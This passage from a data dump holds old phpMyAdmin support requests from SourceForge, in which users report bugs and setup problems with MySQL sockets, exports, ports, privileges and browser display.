phpinfo can be found here http 24.167.229.39 yes mysql is running [root localhost root] ps aux | grep mysql root 4632 0.0 0.2 4196 1192 pts 1 S 19 16 0 00 bin sh usr bin mysqld safe datadir= var lib mysql pid file= var lib mysql localhost.localdomain.pid mysql 4662 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4663 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4664 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4665 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4666 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4667 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4668 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4669 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4670 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] mysql 4671 0.0 3.5 30100 17988 pts 1 S 19 16 0 00 [mysqld] root 4777 0.0 0.1 3572 640 pts 0 S 19 45 0 00 grep mysql [root localhost root] [serotonin localhost serotonin] cat etc my.cnf [mysqld] datadir= var lib mysql socket= var lib mysql mysql.sock [mysql.server] user=mysql basedir= var lib [safe mysqld] err log= var log mysqld.log pid file= var run mysqld mysqld.pid [serotonin localhost serotonin] [serotonin localhost serotonin] locate mysql.sock [serotonin localhost serotonin] [serotonin localhost serotonin] su root Password [root localhost root] locate mysql.sock var lib mysql mysql.sock [root localhost root] thanks for anything.
!
D Ryan.
Original URL https sourceforge.net p phpmyadmin support requests 229 https sourceforge.net p phpmyadmin support requests 229 Original author anonymous","bug"
"24444","2046","2.4.0) Wrong export of NULL.
This error occurs in phpMyAdmin 2.4.0, please check with future versions...
If a field has the NULL flag set, and has a default value different than NULL, i.e.
0 , when exporting the table, the NULL flag is ommited, that is, the field is marked as a NOT NULL, instead of the original NULL.
However, if the column has a default value of NULL, the table is exported properly, having the column set to NULL.
Milan da ponte msn.com Original URL https sourceforge.net p phpmyadmin support requests 230 https sourceforge.net p phpmyadmin support requests 230 Original author anonymous","bug"
"24444","2047","permission problem on multiple users database.
Please can some one help me??
I am running a little webserver with virtual servers on it and need to create databases for each domain.
I have created the databases using phpMyAdmin but all users seem to be able to see all databases.. can some one help me with what permissions i should be setting or accounts access i should be assigning I have created a new database via phpMyAdmin connected as root and the assigned a user to that database and no other yet when u connect as that user you see all databases...
Please help!!!
Original URL https sourceforge.net p phpmyadmin support requests 231 https sourceforge.net p phpmyadmin support requests 231 Original author bryntjones","bug"
"24444","2048","Unable to use the pma database and all features related.. How do you get the extra features database to work.
This server has multiple users so these features would be very useful.
I have followed the manual and configured the tables and database name in the config file.
I ran the create tables sql script and created the phpmyadmin user name like mentioned in the documentation yet the features remain disabled and the help page says that the database is ok but all of the tables status says not ok.
I have recreated the tables over and over yet nothing makes this work.
I even checked the tables and they were created in the deticated database and appear to be perfectly ok.
Original URL https sourceforge.net p phpmyadmin support requests 232 https sourceforge.net p phpmyadmin support requests 232 Original author cattack Found in version 2.5.0 rc1","bug"
"24444","2049","after install alle frames showing this xc2x8bx08.
Efter instal of phpmyadmin 2.4.xx and 2.5 the onlything in the frames is xc2x8bx08 im running a older version and it works well Please help Original URL https sourceforge.net p phpmyadmin support requests 233 https sourceforge.net p phpmyadmin support requests 233 Original author anonymous","bug"
"24444","2050","2.5.0 rc2) font size too big in left frame.
the font size of the tables in the left frame is as big as the db names.
I looked into the function PMA setFontSizes ) in common.lib.php and saw that the values haven t changed since 2.3.0 In 2.3.0 the font sizes were correct).
When I change font smaller from 90 to 82 the size will be ok, but the space between lines are too big.
When I change it to 8pt it is OK for me, but only when the Text Size in the IE Menu View amp;gt;Text Size) is set to Medium.
So something else must have been changed.
Browser IE6 on NT4 Original URL https sourceforge.net p phpmyadmin support requests 234 https sourceforge.net p phpmyadmin support requests 234 Original author j0erch","bug"
"24444","2051","Table creation error.
Whenever I try to create a table, it won t create it because it tries to insert all the fields twice.
But yet, I only enter the fields one time.
Any idea what could be going on?
ryan ideawire.com Original URL https sourceforge.net p phpmyadmin support requests 235 https sourceforge.net p phpmyadmin support requests 235 Original author anonymous","bug"
"24444","2052","Load Data.
The command amp;quot;insert datas from a text file amp;quot; my free translation fron French) which appears at the very end of the page amp;quot;propriety amp;quot; associated with a table in version 2.4.0 of phpMyAdmin and earlier in version 2.2.2) has simply desapeared from version 2.5.0 and if you try to use it with MySQL 4.0.12 you get an answer that the command amp;quot;Load Data Local amp;quot; is no longer supported.
MySQL documentation indicates that there was a security risk associated with this command and that it function under certain conditions.
But why phpMyAdmin does not integrate these conditions in order to provide this functionality which is quite usefull when communicating with people still using Excel to manipulate datas).
from Vincent Degot degot poly.polytechnique.fr registration pending) Original URL https sourceforge.net p phpmyadmin support requests 236 https sourceforge.net p phpmyadmin support requests 236 Original author anonymous Found in version 2.4.0","bug"
"24444","2053","port ignored from 2.4.0 gt; 2.5.0 rc2.
I have a box with mysql 3.2.53 running on port 3306 and 4.0.12 running on port 3307 With phpMyAdmin 2.3.2 it allows for connections to both dbs on both ports.
Attempts to upgrade to 2.4.0, and 2.5.0 rc2 fail.
myadmin will only connect to port 3306 and ignores the port var in the config.
Once logged in it states amp;quot;MySQL 3.2.53 running on localhost 3307 as root localhost amp;quot; however, it is connected to 3306 since I am running 2 completely different dbs on the different ports.
Ryan di Rocco ryan.dirocco publixdirect.com Original URL https sourceforge.net p phpmyadmin support requests 237 https sourceforge.net p phpmyadmin support requests 237 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","2054","delete ... from .... after the delete the request is fail http domain.net mysql domain.net mysql sql.php?
lang=de iso 8859 1 amp;amp;server=1 amp;amp;db=xxx amp;amp;table=xxx amp;amp;pos=0 amp;amp;session max r ows=30 amp;amp;disp direction=horizontal amp;amp;repeat cells=100 amp;amp;do ntlimitchars=0 amp;amp;sql query=SELECT 2A FROM 60xxx 60 amp;amp;zero rows=Die Zeile wurde gel F6scht.
amp;amp;goto=tbl properties.php amp;amp;message=Gel F6schte Zeilen 3A 26nbsp 3B1 Original URL https sourceforge.net p phpmyadmin support requests 238 https sourceforge.net p phpmyadmin support requests 238 Original author anonymous","bug"
"24444","2055","QueryFrame.
If you seht the QueryFrame to FALSE then in the left menue is coming up an javascript error.
Original URL https sourceforge.net p phpmyadmin support requests 240 https sourceforge.net p phpmyadmin support requests 240 Original author anonymous","bug"
"24444","2056","header warnings with all errors warnings on in php.ini.
Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\ob.lib.php on line 65 Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\header http.inc.php on line 14 Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\header http.inc.php on line 15 Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\header http.inc.php on line 16 Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\header http.inc.php on line 17 Warning Cannot add header information headers already sent in D \wwwROOT\phpMyAdmin 2.5.0 \libraries\header http.inc.php on line 20 I have configured my php.ini to view all errors amp;amp; warnings and i encounter this next to sql request.
I think this can be solved by adding the good error reporting level on top of scipt Best regards Fred Original URL https sourceforge.net p phpmyadmin support requests 239 https sourceforge.net p phpmyadmin support requests 239 Original author frederes","bug"
"24444","2057","says cannot find mysql.sock.
When I try to access the index.php for phpMyAdmin it says the following message on the page that loads MySQL said Can t connect to local MySQL server through socket var lib mysql mysql.sock 2) I m sure this means that I ve got a problem with mysql or php, or something, but I don t know what.
Any help identifying the problem would really help.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 241 https sourceforge.net p phpmyadmin support requests 241 Original author tristion Found in version 2.4.0","bug"
"24444","2058","pma relation doesn t show effect.
Hi, in version 2.3.x the relation has worked out pretty well.
In 2.5.0 rc 2) I ve set up the pma tables correctly.
My pma relation looks like this Generated by phpMyAdmin 2.5.0 rc2 SQL query SELECT FROM `pma relation` LIMIT 0, 30; master db master table master field foreign db foreign table foreign field db30394705 de dob DOB MAT ID db30394705 de material MAT ID db30394705 de dob DOB WG ID db30394705 de wg WG ID I know it might look pretty ugly here, but as you can see, I ve related MAT ID and WG ID to the de DOB table.
When I try to insert a new row, the associated fields don t show the related values in a drop down box like before.
What has changed?
How can I make it work again?
Thanks for your help.
Rado Original URL https sourceforge.net p phpmyadmin support requests 242 https sourceforge.net p phpmyadmin support requests 242 Original author lord r Found in version 2.5.0 rc2","bug"
"24444","2059","2.5.0 and OPERA 7.10.
Ver.
2.5.0rc2 goes very good with OPERA.
After installing 2.5.0 I was surprised.
This version still works good with IE but doesn t like OPERA any longer.
The internal frame selection is getting mixed up.
If you try to open the query window with the link in the lower left corner, you ll get the popup window plus the lower left frame will change to the query window.
Also the fields drop down list in the query window gets lost.
Sometimes the selected database in left frame) opens in a new window instead of the right frame... What happened ?
Rado Original URL https sourceforge.net p phpmyadmin support requests 243 https sourceforge.net p phpmyadmin support requests 243 Original author lord r Found in version 2.5.0","bug"
"24444","2060","SQL Query apparently) does not execute in window.
When logged in the system I select the SQL Tab in the database window and then try to execute the proposed query a SELECT from sometable WHERE 1).
To actually execute, I press the GO key.
Well... nothing visible happens.
That is, I do not see any appreciabla output, e.g.
data rows extracted from the DB.
If I open the QUERY window at the bottom of the screen in the left frame and try executing there the query nothing happens as well.
Am I wrong I m rather new to phpMyAdmin or there is something else around ?
My configuration is OS Red Hat 8.1 Browser Mozilla 1.0.1 PhpMyAdmin 2.5.0 MySQL standard 4.0.12 Php 4.3.0 GD 2.0.12 Zlib 1.1.3 Pnglib 1.2.5 Thank you in advance for your help and congratulations for a wonderful phpMyAdmin!
Kind Regards, A. Borrione Original URL https sourceforge.net p phpmyadmin support requests 244 https sourceforge.net p phpmyadmin support requests 244 Original author anonymous","bug"
"24444","2061","No loading in quot;tbl properties structure.php quot; with OBGzip.
There are problem in amp;quot;tbl properties structure.php amp;quot;.
Sometimes the script will never stop until timeout when query some table, but some are not.
So I trace the script line by line.
I found that the problem at line 659 require .
tbl query box.php ); If I insert amp;quot;exit ); amp;quot; before this line, the script works fine.
Otherwise, the script will not stop.
I think this is a bug.
Hope you guys check it out.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 245 https sourceforge.net p phpmyadmin support requests 245 Original author doggy8088","bug"
"24444","2062","Unable to output all database infomation.
I have a database containing roughly 3.3 MB of data with 83000 records spread across 37 tables.
Whenever I attempt to carry out a full dump of all that data into an SQL file, the process fails after about 30 seconds and downloads a 3.3 KB file that is corrupt.
One of the tables has 67000 records in, so doing each table individually is not really an option.
The same applies when attempting to restore from a large query file 20000 records of more ).
The process times out and the query isn t properly finished.
Surely if the php timeout was changed by the scripts before they started this would be avoided?
Its most annoying, as at the moment I have to physically copy the MySQL database files around.
I am using MySQL 4, PHP 4.3.0, and the latest phpmyadmin.
In my php file, max execution time is set to 60 seconds, and changing it would be a last resort.
Any ideas and or changes in new versions would be welcome.
Original URL https sourceforge.net p phpmyadmin support requests 246 https sourceforge.net p phpmyadmin support requests 246 Original author thedevo","bug"
"24444","2063","phpMyAdmin downloaded.
phpMyAdmin is downloaded on my computer.
What file s do I upload onto server?
What would be the path that I would upload to?
Thank you Sandy Original URL https sourceforge.net p phpmyadmin support requests 247 https sourceforge.net p phpmyadmin support requests 247 Original author sandysnest","bug"
"24444","2064","Cannot Insert CSV Files.
Greetings PHPmy Admin 2.4.0 displays the following error messages when I try a CSV import into a table Installation details PHPMyAdmin 2.4.0 mysql 3.23.52 php 4.3.1 Apache httpd 2.0.43 8 amp;lt; Notice Undefined variable textfile in home phpMyAdmin ldi check.php on line 28 Notice Undefined variable textfile in home phpMyAdmin ldi check.php on line 34 Warning chmod ) [function.chmod] No such file or directory in home phpMyAdmin ldi check.php on line 34 Notice Undefined variable textfile in home phpMyAdmin ldi check.php on line 48 Warning chmod ) [function.chmod] No such file or directory in home phpMyAdmin ldi check.php on line 62 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin libraries ob.lib.php on line 65 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin header.inc.php on line 27 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin mysql 3.23.52.tar.gzheader.inc.php on line 28 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin header.inc.php on line 29 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin header.inc.php on line 30 Warning Cannot modify header information headers already sent by output started at home phpMyAdmin ldi check.php 28) in home phpMyAdmin header.inc.php on line 32 8 amp;lt; I am actively investigating this issue.
Any suggestions or corrections are appreciated.
JUS Original URL https sourceforge.net p phpmyadmin support requests 248 https sourceforge.net p phpmyadmin support requests 248 Original author jussy Found in version 2.4.0","bug"
"24444","2065","Structure will make 2.5.0 hang.
This structure will make tbl properties.php hang CREATE TABLE mp bruger t id c mediumint 8) unsigned NOT NULL auto increment, postnr c smallint 5) unsigned NOT NULL default 0 , lukket c tinyint 3) unsigned NOT NULL default 0 , navn c varchar 50) NOT NULL default , epost c varchar 50) NOT NULL default , kode c varchar 32) NOT NULL default , mailkode c varchar 30) NOT NULL default , sessionid c varchar 32) NOT NULL default , sessionip c varchar 32) NOT NULL default , sessiontid c datetime NOT NULL default 0000 00 00 00 00 00 , oprettettid c datetime NOT NULL default 0000 00 00 00 00 00 , oprettetip c varchar 32) NOT NULL default , oprettetepost c varchar 50) NOT NULL default , ftpsti c varchar 50) NOT NULL default , ftpkode c varchar 30) NOT NULL default , ftpantal c mediumint 8) unsigned NOT NULL default 0 , uid smallint 5) unsigned NOT NULL default 80 , gid smallint 5) unsigned NOT NULL default 80 , shell varchar 20) default NULL, PRIMARY KEY id c), KEY lukket c lukket c), KEY epost c epost c), KEY ftpkode c ftpkode c) ) TYPE=MyISAM; Original URL https sourceforge.net p phpmyadmin support requests 249 https sourceforge.net p phpmyadmin support requests 249 Original author anonymous","bug"
"24444","2066","export database name template not remembered.
Hi, Every time i export my database, the template name i use DB Y m d) isn t remembered !
Cookies are yet activated on my machine...
Thanks for it !
;) Regards Fred Original URL https sourceforge.net p phpmyadmin support requests 250 https sourceforge.net p phpmyadmin support requests 250 Original author frederes","bug"
"24444","2067","No quot;Upload Textfile quot; box.
Ok, I just finished installing and setting up the config.inc.php file.
I followed all the instructions except when I go to upload a file I do not see an amp;quot;Upload Textfile amp;quot; box.
I ve included a picture of the area where the upload box isn t http home.villagephotos.com 2003 3 3485 mydb.jpg amp;lt; that is my db ).
Can someone please explain to me how to fix this?
My email is dante r87 hotmail.
Any help with this would be much appreciated!
Original URL https sourceforge.net p phpmyadmin support requests 251 https sourceforge.net p phpmyadmin support requests 251 Original author anonymous","bug"
"24444","2068","erroneuous query sort order.
When browsing a database table, you can click on a column heading, which adds an amp;quot;order by amp;quot; clause to the corresponding query.
However, clicking twice adds the clause twice, which is not accepted by mysql and reports the following error Error SQL query SELECT FROM `AssignedReview` ORDER BY `PaperID` ASC ORDER BY `PaperID` ASC LIMIT 0 , 30 MySQL said You have an error in your SQL syntax near ORDER BY `PaperID` ASC LIMIT 0, 30 at line 4 The correct behaviour would be to replace the ASC clause by a similar DESC clause.
Furthermore it should be possible to click on multiple columns in which case a composite order clause should be generated, e.g., SELECT FROM `AssignedReview` ORDER BY `PaperID` ASC , assignment sid DESC LIMIT 0 , 30 This also doesn t wor it produces tow order by clauses) PS.
Thanks for the great work.
phpMyAdmin is really useful to me.
My version info phpMyAdmin 2.5.0 mysql Ver 11.15 Distrib 3.23.41, for redhat linux gnu i386) Original URL https sourceforge.net p phpmyadmin support requests 252 https sourceforge.net p phpmyadmin support requests 252 Original author anonymous","bug"
"24444","2069","log in information needed.
I recently downloaded phpMyAdmin 2.3.0 on my web server.
I believe that it downloaded fine but, I was asked for username and password to access the program.
Where would I find this information?
I was not asked to input this data when downloading the software.
I would greatly appreciate any and all input.
I am eager to use this software.
Thank you, wildgardenchild Original URL https sourceforge.net p phpmyadmin support requests 253 https sourceforge.net p phpmyadmin support requests 253 Original author wildgardenchild","bug"
"24444","2070","tables with more than 11 fields leads to failures.
There is an artificial restriction in phpmyadmin on working with tables having more than 11 eleven) fields.
Following functions do not work create tables with more than 11 fields display structure of existing table having more than 11 fields display database overview of an database than contains a table having more than 11 fields Always the same behavior the page containing structure information editor is not loaded.
System configuration phpMyAdmin v2.5.0 earlier versions have same bug!)
MySQL v4.0.13 nt OS Windows 2000 Server Webserver IIS Webbrowser 6.0.2800.1106 Original URL https sourceforge.net p phpmyadmin support requests 254 https sourceforge.net p phpmyadmin support requests 254 Original author anonymous","bug"
"24444","2071","IE 6 w Patch Q813489 phpMyAdmin bug?.
Re Post another message!
https sourceforge.net forum forum.php?
thread id=866461 amp;amp;forum id=72908 I am using IE 6, 128 Bit Cipher Strength, SP1 and patch Q330994 installed, to access phpmyadmin 2.4.0 When I apply MS s newest IE patch April 2003, Cumulative Patch for Internet Explorer 813489)) available amp;lt;a href= amp;quot;http www.microsoft.com windows ie downloads cr itical 813489 default.asp amp;quot; amp;gt;here amp;lt; a amp;gt; I lose some of the functionality of phpmyadmin, namely any type of select.
When I uninstall the patch, everything is hunky dory.
This is weird.
Is anyone else experiencing this or have the patch applied and IE works fine?
Original URL https sourceforge.net p phpmyadmin support requests 255 https sourceforge.net p phpmyadmin support requests 255 Original author andrewchoi","bug"
"24444","2072","Can t put data in a varchar field.
Look at this pictures http egbv.homeip.net 8888 bugs pma pic1 opera.gif http egbv.homeip.net 8888 bugs pma pic1 xc3xade6.gif How can I solve the problem with the input fields?
Original URL https sourceforge.net p phpmyadmin support requests 256 https sourceforge.net p phpmyadmin support requests 256 Original author dwlnetnl Found in version 2.5.0","bug"
"24444","2073","In Safari export tab does not display Save as file checkbox.
I m running v 2.5.1 with Safari 1.0 Beta 2 v74) If I select the Export tab for a database, the Save as file checkbox is not displayed.
Original URL https sourceforge.net p phpmyadmin support requests 257 https sourceforge.net p phpmyadmin support requests 257 Original author anonymous Found in version 2.5.1","bug"
"24444","2074","Associated databases not visible when user host = .
The following is using http auth type.
MySQL version 4.0.13 When i set up a user that can connect from any host host= ), and give the user privileges on a database, the user can log in successfully only if they have no password, SEE NOTE 1).
Once logged in, the user cannot see any databases.
If the user host is changed to localhost , the database becomes visible.
NOTE 1 If a user has a password and host is set to it is not possible to log in.
I m sorry if this is not clear, if it doesn t make sense post a reply and i will try to clarify.
Original URL https sourceforge.net p phpmyadmin support requests 258 https sourceforge.net p phpmyadmin support requests 258 Original author datallah","bug"
"24444","2075","sql.php never displays data.
Heres the problem on a table of any number of rows, any number of fields, when sql.php tries to display the page it does not work.
First, it would not display anything, and we turned off the OBZip directive.
This changed it from a nothing page to a page with the header information truncated.
It truncates seemingly randomly, but always the same for each query.
This behavior exists in 2.4.0 and 2.5.1, and on PHP 4.3.2 and 4.3.1 all on Apache 1.3.27. current string is Apache 1.3.27 OpenSSL 0.9.6i Unix) PHP 4.3.1).
Maybe this isnt a phpmyadmin problem, but maybe you can help to point me in the right direction.
This problem is not exhibited on any other script page, just sql, so it is something related to it.
Thanks for any help onyxraven gamewatchers.net Original URL https sourceforge.net p phpmyadmin support requests 259 https sourceforge.net p phpmyadmin support requests 259 Original author onyxraven","bug"
"24444","2076","Unable to quot;browse quot; mysql.user table with latest release.
Since a couple of revisions of phpMyAdmin ago, I m unable to browse the MySQL amp;quot;users amp;quot; table.
When I go to do this, it just hangs.
This is true with 2.5.1.
I have MySQL 3.23.56 installed, and am able to browse this table with other tools or through the command line.
I tried modifying the amp;quot;control amp;quot; user to be root, to experiment, and the same problem occurs.
Is this a known bug, or did I do something wrong in the config?
I granted privileges to the amp;quot;control amp;quot; user and indeed the amp;quot;control amp;quot; user is able to view other tables... and if I remove the password for amp;quot;control amp;quot; phpmyadmin will show an error from the mysql server.
If I use the command line mysql client to select from the mysql.user database, I am able to read it fully without any problem.
So, I m going to presume the bug is somewhere in the phpmysqladmin process.
This is the mysql statement I used GRANT USAGE ON mysql.
TO control localhost IDENTIFIED BY somepassword ; GRANT SELECT ON mysql.db TO control localhost ; GRANT SELECT ON mysql.host TO control localhost ; GRANT SELECT Host, Db, User, Table name, Table priv, Column priv) ON mysql.tables priv TO control localhost ; GRANT SELECT Host, User, Select priv, Insert priv, Update priv, Delete priv, Create priv, Drop priv, Reload priv, Shutdown priv, Process priv, File priv, Grant priv, References priv, Index priv, Alter priv ) ON mysql.user TO control localhost ; I m not sure how to debug this, and would appreciate any assistance as it s very aggravating ) Thanks, Forrest Original URL https sourceforge.net p phpmyadmin support requests 260 https sourceforge.net p phpmyadmin support requests 260 Original author forrie","bug"
"24444","2077","PDF pages hang in Opera 7.
When trying to view the PDF schema in Opera 7.11 for Windows and Opera is set to use the Acrobat Reader plugin it downloads the document I can tell by the data transfered) but then just holds on it.
If I disable the use of the plugin it saves the file just fine.
I did a bit of checking and IE and Mozilla are automatically downloading even when set to use the plugin.
I haven t had a chance to check other versions of Opera.
Michael Johnson mjohnson pitsco.com don t have my log in info again) Original URL https sourceforge.net p phpmyadmin support requests 261 https sourceforge.net p phpmyadmin support requests 261 Original author anonymous","bug"
"24444","2078","Can t login mysql.sock).
I have the config.inc.php set for http auth type, but when I type the root account amp;amp; password that I use for when I shell in and type mysql, phpsqladmin doesn t log me in.
the mysql command works with that password, but phpmyadmin doesn t. Original URL https sourceforge.net p phpmyadmin support requests 262 https sourceforge.net p phpmyadmin support requests 262 Original author quark122","bug"
"24444","2079","Insertion of sql file No SQL Query!
Error.
First, sorry about my bad English ) I ve got an error with several computers Every time, I inserted a sql file which was extracted with the same or older versions), nothing happens but an error occurs No SQL Query!
.
The sql files has been extracted from phpMyAdmin 2.5.1, 2.5.0, 2.4.0 and inserted with 2.5.0 and 2.5.1; everytime the same error.
If you insert it on 2.4.0 all works fine.
If the sql file is small 30kb), you can copy the source code and post it in the textarea above the upload field.
This works fine, except of bigger files amp;gt;100kb.
In this case, IExplore or Netscape hangs.
As said above, I have tested it, on 5 computers, all with Windows XP.
greets Ghoose Ghoose1 web.de Original URL https sourceforge.net p phpmyadmin support requests 263 https sourceforge.net p phpmyadmin support requests 263 Original author anonymous","bug"
"24444","2080","Table rename forces lower case?.
I am not sure if I should report this as a bug, or if this is a amp;quot;feature amp;quot;.
I have some tables that I created using v.2.5.0 such as amp;quot;PMA bookmark amp;quot; and amp;quot;PMA relation amp;quot; note the upper case PMA).
When I went to rename a new table that I created incorrectly, I noticed the resulting table name was all lower case.
So, to verify this, I clicked on OPERATIONS on the amp;quot;PMA bookmark amp;quot; table and clikced on the [go] next to rename without changing the name and the upper case PMA became amp;quot;pma bookmark amp;quot;?
Let me know if I should report this as a bug.
Original URL https sourceforge.net p phpmyadmin support requests 264 https sourceforge.net p phpmyadmin support requests 264 Original author spladow Found in version 2.5.1","bug"
"24444","2081","TEXT field shows unicode in remote dump.
HOW TO DUPLICATE From remote ??Unix??)
box choose individual table, choose export.
Do single table data dump from MySQL 3.23.54 to SQL file.
Table must contain 1 text field.
Either view or save as file on local system doesn t matter.)
ISSUE Dump is fine, except Text field which reports as unicode rather than text in the .sql file.
Thus a Windows system cannot retrieve and edit the field contents in the dump with a simple text editor.
Original URL https sourceforge.net p phpmyadmin support requests 265 https sourceforge.net p phpmyadmin support requests 265 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","2082","Why no config.inc.php3?
Where is it?.
After unpacking phpMyAdmin 2.5.1 php.tar.gz on my server s doc root and also locally so I could peruse the files more easily) I cannot find the file config.inc.php3 or anything close to it.
The installation instructions ask that this file be customized for my server, so without it I cannot see how to proceed in order to try out phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin support requests 266 https sourceforge.net p phpmyadmin support requests 266 Original author anonymous","bug"
"24444","2083","Serious CREATE TABLE Error in phpMyAdmin 2.5.1.
Dear phpMyAdmin Team, I recently upgraded 2 rackservers from the phpMyAdmin 2.5.0 to the new phpMyAdmin 2.5.1.
On both servers it s now unpossible to create new tables.
I just try to create an normal table.
With the first colomn id) notnull auto increment primary key, the following error appears Error SQL query CREATE TABLE `testje` `id` INT 11 ) NOT NULL AUTO INCREMENT , `tekst` VARCHAR NOT NULL , PRIMARY KEY `id` ) ) MySQL said You have an error in your SQL syntax near NOT NULL, PRIMARY KEY `id`)) at line 1 We would like to hear what s wrong because we and our customers use your great app almost all day long ; ) I just downgraded phpMyAdmin back to the 2.5.0 version where the problem does not exist.
Kind Regards, Marc Mes NedLinux.nl Original URL https sourceforge.net p phpmyadmin support requests 267 https sourceforge.net p phpmyadmin support requests 267 Original author marcmes","bug"
"24444","2084","Safari Unable to change case in VARCHAR field..
When editing data in a VARCHAR field we are unable to simply change the case of the contents of a field.
For example, phpMyAdmin will not allow us to change amp;quot;foobar amp;quot; to amp;quot;fooBar amp;quot;.
We have to change amp;quot;foobar amp;quot; to amp;quot;foobar blah amp;quot;, save the record, then change amp;quot;foobar blah amp;quot; to amp;quot;fooBar amp;quot;.
Original URL https sourceforge.net p phpmyadmin support requests 268 https sourceforge.net p phpmyadmin support requests 268 Original author trunkmonkey","bug"
"24444","2085","Mixture of buttons and links.
When browsing one particular table in IE 6, Win2K Pro, Apache 2, PHP 4.3.2, phpMyAdmin 2.5.0 and 2.5.1, MySQL 3.23.47 some of the edit and delete links in the table appear as buttons.
With both computers, the database is on a remote computer just in case it helps).
Strangely enough when I view it from another computer with the same specs, I see the same combination of buttons and links.
Attached is a screen shot of the problem.
Original URL https sourceforge.net p phpmyadmin support requests 269 https sourceforge.net p phpmyadmin support requests 269 Original author mrsmiley18","bug"
"24444","2086","IE6 doesn t show updated table.
I created three tables in one database.
IE6.0.2800 doesn t show updated table information.
But IE6.0.2600 shows.
Is it bug or not?
I am using 2.5.0 Original URL https sourceforge.net p phpmyadmin support requests 270 https sourceforge.net p phpmyadmin support requests 270 Original author yuancheng Found in version 2.5.0","bug"
"24444","2087","pmaAbsoluteURI mbstring.
I install the phpadmin but i get a massage at the bottom of page.
The cfg[ PmaAbsoluteUri ] directive MUST be set in your configuration file!
You are using PHP 4.2.3, which has a serious bug with multi byte strings mbstring).
See PHP bug report 19404\.
This version of PHP is not recommended for use with phpMyAdmin.
what up with that?
help please Thanks Bernie Original URL https sourceforge.net p phpmyadmin support requests 271 https sourceforge.net p phpmyadmin support requests 271 Original author ebdozier","bug"
"24444","2088","SQL Query Export and Insertion.
Email neil 247pchelp.co.uk Maybe this is obvious, but I export to an SQL file the structure and data of one database, and copy and paste the exact code straight into the SQL section of another database.
This was fine in theory, but phpMyAdmin kept saying amp;quot;you have an error in your SQL syntax.
amp;quot; I have also tried this method through MySQL Front, on another server my server doesn t have MySQL Front), and the same error occurs.
Can anybody help me?
I don t want to have to make this database from scratch, it s huge.
Also I ve tried doing the above, with just the structure, and the same error appears.
Help pls?
Thanks in advance, Neil Original URL https sourceforge.net p phpmyadmin support requests 272 https sourceforge.net p phpmyadmin support requests 272 Original author anonymous","bug"
"24444","2089","quot; quot; character in db name.
A friend og me made me a db called new students but I canxc2xb4t name a DB with amp;quot; amp;quot; character, why is that?
when I try to make a DB amp;quot; amp;quot; it says that it doesnxc2xb4t support that character thanks Original URL https sourceforge.net p phpmyadmin support requests 273 https sourceforge.net p phpmyadmin support requests 273 Original author anonymous Found in version 2.5.0","bug"
"24444","2090","LOAD DATA INFILE misquotes table.
Under MySQL 4.1 alpha, PHP 4.3.1, and Apache 2.0.44, the command to insert data from a file is broken in that it places quotes around the name of the table, ostensibly required ) from mars in the form of table in ldi table.php.
PHP sends along amp;quot;LOAD DATA LOCAL INFILE C \\WINDOWS\\TEMP\\php113.tmp INTO TABLE `filesystem` FIELDS TERMINATED BY , LINES TERMINATED BY \r\n ; amp;quot; to insert a CSV file, MySQL docs say that this should be amp;quot;LOAD DATA LOCAL INFILE C \\WINDOWS\\TEMP\\php113.tmp INTO TABLE filesystem.filesystem FIELDS TERMINATED BY , LINES TERMINATED BY \r\n ; amp;quot;, fully qualified with the database name and with no quotes.
Thanks in advance!
Andrew Cook TwelveBaud Studios Original URL https sourceforge.net p phpmyadmin support requests 274 https sourceforge.net p phpmyadmin support requests 274 Original author twelvebaud Found in version 2.4.0","bug"
"24444","2091","unable to display edit tables.
I just installed phpmyadmin, and set the config to the username password used by postnuke.
The interface shows all the postnuke tables in the left frame, but does not show any other databases.
Clicking on a table just brings up a message saying that table name doen t exist.
Also I can create new databases and tables but they do not show up in the left frame.
A new table I created for the postnuke db shows up in the main frame when I click on the database name on the left.
All tables are available at the command line.
System is Redhat Apache.
Any help would be greatly appreciated!
Original URL https sourceforge.net p phpmyadmin support requests 275 https sourceforge.net p phpmyadmin support requests 275 Original author saxtuplet","bug"
"24444","2092","no defaults file option in config.inc.php.
When trying to administer with phpMyAdmin both MySQL 3.23 and MySQL 4.1 alpha running on the same machine I encounter the following strange error.
I have configured MySQL 4.1 to run on port 4106.
The 3.23 version runs on 3306.
When I type in this value in the config.inc.php it still connects to the 3306 port as it displays it on the welcome screen of phpMyAdmin) Only when I use the socket mode of connection and type in the full path of the socket file I can use the 4.1a version running on port 4106.
I don t know if this is a bug or a feature, maybe it would be very useful to be able to include in the config.inc.php file an option for the defaults file parameter of MySQL.
phpMyAdmin version 2.5.1 and 2.5.2 dev just downloaded) MySQL 3.23 and MySQL 4.1alpha Original URL https sourceforge.net p phpmyadmin support requests 276 https sourceforge.net p phpmyadmin support requests 276 Original author anonymous","bug"
"24444","2093","Calendar Week View for Events.
